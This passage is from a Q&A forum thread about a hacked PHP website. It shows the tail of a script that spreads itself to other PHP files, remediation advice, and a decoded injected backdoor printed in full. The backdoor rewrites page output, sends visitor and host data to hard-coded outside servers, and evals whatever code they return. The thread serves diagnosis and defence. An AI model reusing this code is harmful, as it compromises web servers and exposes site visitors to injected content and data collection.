            get_file_extension($file) == 'php') {
                modify($dir.DIRECTORY_SEPARATOR.$file);
            }
        }

        if (is_dir($dir.DIRECTORY_SEPARATOR.$file)) {
            $deep++;
            dir_num($dir.DIRECTORY_SEPARATOR.$file);
            $deep--;
        }
    }@closedir($odir);
}

Echo 'Wait please...<br>';

$dir = dirname(__FILE__);
dir_num($dir);



echo '<script>window.location.reload();</script>';
exit();

in this part the script tries to find other php files in the current and in the subdirecories and infects them too.

Upvotes: 7

Rohan Durve
Rohan Durve

Reputation: 15

Coming from a security background I'm pretty sure your web server has been hacked. To begin with it is generally a good idea to investigate the source, to prevent making that mistake from occurring again.

To begin with:

  • Find the first files infected via the time stamps.
  • Log active running scripts to determine what is causing this or errors in your PHP logs, etc.

If you're on a shared hosting there isn't much you can do, shared hosting users are generally more vulnerable to getting cracked but if you're on a VPS or better you can contact your host in case of a managed hosting for a complete format or necessary security fixed.

However, the thing is that removing those snippets will 99.99% of the time have no use, it won't prevent the cracker in the future. Changing passwords helps, but again it is not a solid solution.

If you have the resources, hire a security professional to do a quick audit. There are many that ask for payment only if they find a weakness. If not, then re-evaluate potential weak points in your server. Refer to this one for Linux Servers (http://www.thegeekstuff.com/2011/03/apache-hardening) Incase you're using Windows, let me know I'll link you to a few for windows IIS as well.

Glad I could help!

Upvotes: 1

nathanjosiah
nathanjosiah

Reputation: 4459

I would say remove all of the snippets like it, change all of your passwords and if possible, take your website offline until support can get back to you. It sure looks like its up to no good, after some digging through the code and decoding, i found this:

<?php 

if (!function_exists("GetMama")){
    function mod_con($buf){
        str_ireplace("<body>","<body>",$buf,$cnt_h);if ($cnt_h == 1) {
            $buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf); return $buf;
        }str_ireplace("</body>","</body>",$buf,$cnt_h);if ($cnt_h == 1) {
            $buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf); return $buf;
        }return $buf;
    }function opanki($buf){
        $gz_e = false;$h_l = headers_list();if (in_array("Content-Encoding: gzip", $h_l)) {
            $gz_e = true;
        }if ($gz_e){
            $tmpfname = tempnam("/tmp", "FOO");file_put_contents($tmpfname, $buf);$zd = gzopen($tmpfname, "r");$contents = gzread($zd, 10000000);$contents = mod_con($contents);gzclose($zd);unlink($tmpfname);$contents = gzencode($contents);
        } else {$contents = mod_con($buf);
        }$len = strlen($contents);header("Content-Length: ".$len);return($contents);
    } function GetMama(){
        $mother = "www.99bits.com";return $mother;
    }ob_start("opanki");function ahfudflfzdhfhs($pa){
        $mama = GetMama();$file = urlencode(__FILE__);if (isset($_SERVER["HTTP_HOST"])){
            $host = $_SERVER["HTTP_HOST"];
        } else {$host = "";
        }if (isset($_SERVER["REMOTE_ADDR"])){
            $ip = $_SERVER["REMOTE_ADDR"];
        } else {$ip = "";
        }if (isset($_SERVER["HTTP_REFERER"])){
            $ref = urlencode($_SERVER["HTTP_REFERER"]);
        } else {$ref = "";
        }if (isset($_SERVER["HTTP_USER_AGENT"])){
            $ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));
        } else {$ua = "";
        }if (isset($_SERVER["QUERY_STRING"])){
            $qs = urlencode($_SERVER["QUERY_STRING"]);
        } else {$qs = "";
        }$url_0 = "http://" . $pa;$url_1 = "/jedi.php?version=0991&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;$try = true;if( function_exists("curl_init") ){
            $ch = curl_init($url_0 . $url_1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_TIMEOUT, 3);$ult = trim(curl_exec($ch));$try = false;
        } if ((ini_get("allow_url_fopen")) && $try) {
            $ult = trim(@file_get_contents($url_0 . $url_1));$try = false;
        }if($try){
            $fp = fsockopen($pa, 80, $errno, $errstr, 30);if ($fp) {
                $out = "GET $url_1 HTTP/1.0\r\n";$out .= "Host: $pa\r\n";$out .= "Connection: Close\r\n\r\n";fwrite($fp, $out);$ret = "";while (!feof($fp)) {
                    $ret  .=  fgets($fp, 128);
                }fclose($fp);$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
            }
        }  if (strpos($ult,"eval") !== false){
            $z = stripslashes(str_replace("eval","",$ult)); eval($z); exit();
        }if (strpos($ult,"ebna") !== false){
            $_SERVER["good"] = str_replace("ebna","",$ult);return true;
        }else {return false;
        }
    }$father2[] = "78.46.173.14";$father2[] = "176.9.218.191";$father2[] = "91.228.154.254";$father2[] = "77.81.241.253";$father2[] = "184.82.117.110";$father2[] = "46.4.202.93";$father2[] = "46.249.58.135";$father2[] = "176.9.241.150";$father2[] = "46.37.169.56";$father2[] = "46.30.41.99";$father2[] = "94.242.255.35";$father2[] = "178.162.129.223";$father2[] = "78.47.184.33";$father2[] = "31.184.234.96";shuffle($father2);foreach($father2 as $ur){
        if ( ahfudflfzdhfhs($ur) ) {
            break ;
        }
    }
}

Upvotes: 5

JonH
JonH

Reputation: 33141

It appears to be a php type shell script that is injected into your site. It could be a vulnerability by the web hosting company or your personal web app allowing the hack to occur.

Upvotes: 0

Related Questions